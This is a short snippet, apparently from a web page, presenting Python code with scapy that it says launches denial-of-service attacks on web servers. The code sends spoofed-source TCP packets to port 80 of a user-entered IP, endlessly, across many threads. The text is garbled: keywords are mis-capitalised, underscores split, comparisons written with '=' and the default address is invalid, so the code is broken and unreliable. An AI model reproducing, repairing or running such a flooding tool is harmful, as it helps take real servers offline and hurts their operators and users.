The following python code can launch denial-of-service (DoS) attacks on web servers:
#-*-Coding: cp936 -*-
From scapy. all import *
From threading import Thread, activeCount
From random import randint
Class Loop (Thread ):
Def _ init _ (self, remoteAddr ):
Thread. _ init _ (self)
Self. remoteAddr = remoteAddr
Def run (self ):
Ip = str (randint (0,255) + '.'\
+ Str (randint (0,255) + '.'\
+ Str (randint (0,255) + '.'\
+ Str (randint (0,255 ))
Sr1 (IP (src = ip, dst = self. remoteAddr)/TCP (dport = 80), retry = 0, verbose = 0, timeout = 3)
Class Main (Thread ):
Def _ init _ (self, remoteAddr ):
Thread. _ init _ (self)
Self. remoteAddr = remoteAddr
Def run (self ):
Limit = 140
Total = 0
While True:
If activeCount () <limit:
Loop (remoteAddr = self. remoteAddr). start ()
Total = total + 1
Print 'The number of times HttpFlood has been performed: ', total
If _ name _ = '_ main __':
RemoteAddr = raw_input ('IP = ')
If remoteAddr = '':
RemoteAddr = '2017. 103.25.12'
Main (remoteAddr = remoteAddr). start ()